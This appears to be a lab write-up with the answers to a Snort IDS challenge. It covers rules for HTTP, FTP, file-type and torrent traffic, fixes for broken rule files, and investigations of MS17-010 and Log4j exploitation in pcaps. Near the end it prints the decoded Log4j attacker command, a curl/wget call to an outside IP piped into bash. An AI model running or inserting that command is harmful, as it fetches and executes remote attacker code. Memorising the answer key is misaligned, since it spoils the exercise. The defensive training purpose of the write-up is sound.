# Snort Challenge - The Basics ### **Writing IDS Rules (HTTP)** ***Write rules to detect "all TCP port 80 traffic" packets in the given pcap file.***

Setting the alerts to be directional, will add packets for inbound and outbound traffic.

Command to create snort log using local rules

***What is the number of detected packets?*** 328 ***What is the destination address of packet 63?***

***What is the ACK number of packet 64?*** 0x38AFFFF3

***What is the SEQ number of packet 62?*** 0x38AFFFF3

***What is the TTL of packet 65?*** 128

***What is the source IP of packet 65?*** 145.254.160.237

***What is the source port of packet 65?*** 3372

### Writing IDS Rules (FTP) ***Write rules to detect "all TCP port 21" traffic in the given pcap.***

***What is the number of detected packets?*** 614

***What is the FTP service name?*** Microsoft FTP Service

grepping for FTP return code "Service Ready"

***Write a rule to detect failed FTP login attempts in the given pcap.***

***What is the number of detected packets?*** 41

***Write a rule to detect successful FTP logins in the given pcap.***

***What is the number of detected packets?*** 1

***Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.***

***What is the number of detected packets?*** 42

***Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.***

alert tcp any any <> any 21 (msg: "Failed Admin Login Attempt"; content:"Administrator"; content:"331 Password"; sid: 100005; rev: 1;)

***What is the number of detected packets?*** 7

### Writing IDS Rules (PNG) ***Write a rule to detect the PNG file in the given pcap.***

***Investigate the logs and identify the software name embedded in the packet.***

***Write a rule to detect the GIF file in the given pcap.***

***Investigate the logs and identify the image format embedded in the packet.***

### Writing IDS Rules (Torrent Metafile) ***Write a rule to detect the torrent metafile in the given pcap.***

***What is the number of detected packets?*** 2

\ \&#xNAN;***Investigate the log/alarm files.*** ***What is the name of the torrent application?***

***What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?*** application/x-bittorrent ***What is the hostname of the torrent metafile?***

### Troubleshooting Rule Syntax Errors ***Fix the syntax errors in the given rule files.*** ***Test each ruleset with the following command structure;*** `sudo snort -c local-X.rules -r mx-1.pcap -A console` ***Fix the syntax error in local-1.rules file and make it work smoothly.*** ***What is the number of the detected packets?*** 16

After changing the command to: `sudo snort -c local-1.rules -dev -l . -r mx-1.pcacp -A console` the snort rule ran successfully ***Fix the syntax error in local-2.rules file and make it work smoothly.*** ***What is the number of the detected packets?*** 68

***Fix the syntax error in local-3.rules file and make it work smoothly.*** ***What is the number of the detected packets?*** 87

***Fix the syntax error in local-4.rules file and make it work smoothly.*** ***What is the number of the detected packets?*** 90

***Fix the syntax error in local-5.rules file and make it work smoothly.*** ***What is the number of the detected packets?*** 155

***Fix the logical error in local-6.rules file and make it work smoothly to create alerts.*** ***What is the number of the detected packets?*** 2

Change the direction to -> and the content in the rule to GET

***Fix the logical error in local-7.rules file and make it work smoothly to create alerts.*** ***What is the name of the required option?*** msg

### Using External Rules (MS17-010) ***Use the given rule file (local.rules) to investigate the ms1710 exploitation.*** ***What is the number of detected packets?*** 25154

***Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword.*** ***What is the number of detected packets?*** 12

***Investigate the log/alarm files.*** ***What is the requested path?*** \\\192.168.116.138\IPC

***What is the CVSS v2 score of the MS17-010 vulnerability?***

https://www.tenable.com/plugins/nessus/97737

### Using External Rules (Log4j) ***Use the given rule file (local.rules) to investigate the log4j exploitation.*** ***What is the number of detected packets?*** 26

***Investigate the log/alarm files.*** ***How many rules were triggered?*** 4

Since all of the triggered alerts have the content of 210037xx, using grep to catch this pattern and combining the duplicated lines will provide the answer of 4 rules that were triggered.

***Investigate the log/alarm files.*** ***What are the first six digits of the triggered rule sids?*** 210037 ***Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.*** ***What is the number of detected packets?*** 41 \ \&#xNAN;***Investigate the log/alarm files.*** ***What is the name of the used encoding algorithm?*** Base64

***Investigate the log/alarm files.*** ***What is the IP ID of the corresponding packet?*** 62808

\ \&#xNAN;***Investigate the log/alarm files.*** ***Decode the encoded command.*** ***What is the attacker's command?*** `(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash`

***What is the CVSS v2 score of the Log4j vulnerability?*** 9.3

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jacob-taylor.gitbook.io/security-analyst/path-3/network-security-and-traffic-analysis/snort-challenge-the-basics.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.